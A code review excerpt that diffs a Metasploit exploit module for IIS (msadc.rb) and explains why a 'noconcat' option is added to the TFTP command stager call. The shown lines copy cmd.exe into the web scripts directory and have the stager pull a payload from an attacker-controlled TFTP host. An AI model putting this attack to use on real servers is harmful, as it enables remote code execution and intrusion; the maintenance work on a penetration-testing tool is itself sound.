modules/exploits/windows/iis/msadc.rb

```diff
@@ -344,7 +344,8 @@ def exploit
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
```

Comment:
This module, like `ms01_026_dbldecode`, expects the TFTP command stager to generate commands without concatenation as it needs to strip the `start` command. This is the default behavior for the stager; however, it won't be the default once https://github.com/rapid7/rex-exploitation/pull/34 is merged. Thus `noconcat` was added.